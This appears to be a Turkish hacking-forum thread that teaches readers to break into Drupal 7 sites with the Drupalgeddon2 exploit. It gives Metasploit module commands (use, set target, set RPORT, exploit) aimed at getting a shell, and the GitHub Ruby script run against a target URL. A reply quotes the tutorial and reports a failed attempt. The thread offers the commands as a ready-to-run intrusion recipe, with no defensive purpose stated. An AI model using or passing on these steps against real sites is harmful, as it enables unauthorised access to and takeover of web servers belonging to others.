DrupalGeddon2 İle Sitelere Sızın

EYLL'

Uzman üye
17 May 2019
1,540
188
Hudut
Merhabalar Bu Günkü Toolumuz Drupalgeddon2 .Ruby ile Birlikte Kullanmamız Gerekmekte ve ****sploit e de sahip olmamız gerekmektedir.



Aynı Zamanda Msf içinden de exploite ulaşabilirsiniz.

Drupal Nedir?

Drupal bir içerik yönetim sistemi yani Sayfanızı yönetmenizi sağlayan web programdır.

****sploit Üzerinden Kullanımı

Exploit ;

Kod:
search drupal



ve ya

Kod:
searchsploit drupal 7



Her Zamanki ****sploit . Use , Set , Target ve Rport A ihtiyaç var. ( Port Açmanıza gerek yoktur.)

Üstteki komutlar nedir derseniz hemen anlatıyorum.
use : Kullanmak İstediğiniz Exploit dizinine gider.
Set : Değişkenleri değiştirmek İçin Kullandığımız komuttur.
Target : Hedef adresi göstereceğimiz komuttur.
RPORT: Hedef Port Numarasını Göstereceğimiz komuttur.


Şimdi Exploiti Use Komutu ile Seçelim.

Kod:
use unix/webapp/drupal_drupalgeddon2

Daha Sonra

Kod:
set target 10.x.x.x

Şimdi son adıma geldik. En Azından ****sploit için.

Kod:
set RPORT 1898

Şimdi Shell Adımındayız.

Kod:
" exploit " ve ya " run "

Adımların Uygulanmış Hali Aşağıdaki Gibidir:




Drupalgeddon2 Github Kullanımı

Aslında burası bir tek adımdan oluşmakta.

Kod:
ruby drupalgeddon2.rb https://hedefsite.com/drupal7













 
Son düzenleme:

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,011
1,049
16
Konya Ovası Askeri Tesislerinde
Merhabalar Bu Günkü Toolumuz Drupalgeddon2 .Ruby ile Birlikte Kullanmamız Gerekmekte ve ****sploit e de sahip olmamız gerekmektedir.



Aynı Zamanda Msf içinden de exploite ulaşabilirsiniz.

Drupal Nedir?


Drupal bir içerik yönetim sistemi yani Sayfanızı yönetmenizi sağlayan web programdır.

****sploit Üzerinden Kullanımı


Exploit ;

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]search drupal




ve ya

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]searchsploit drupal 7




Her Zamanki ****sploit . Use , Set , Target ve Rport A ihtiyaç var. ( Port Açmanıza gerek yoktur.)

Üstteki komutlar nedir derseniz hemen anlatıyorum.
use : Kullanmak İstediğiniz Exploit dizinine gider.

Set : Değişkenleri değiştirmek İçin Kullandığımız komuttur.
Target : Hedef adresi göstereceğimiz komuttur.
RPORT: Hedef Port Numarasını Göstereceğimiz komuttur.


Şimdi Exploiti Use Komutu ile Seçelim.

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]use unix/webapp/drupal_drupalgeddon2


Daha Sonra

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]set target 10.x.x.x


Şimdi son adıma geldik. En Azından ****sploit için.

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]set RPORT 1898


Şimdi Shell Adımındayız.

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]" exploit " ve ya " run "


Adımların Uygulanmış Hali Aşağıdaki Gibidir:




Drupalgeddon2 Github Kullanımı


Aslında burası bir tek adımdan oluşmakta.

Kod:
[/COLOR][/CENTER]
[COLOR=White][CENTER]ruby drupalgeddon2.rb https://hedefsite.com/drupal7














Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
Bu hatayı aldım hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.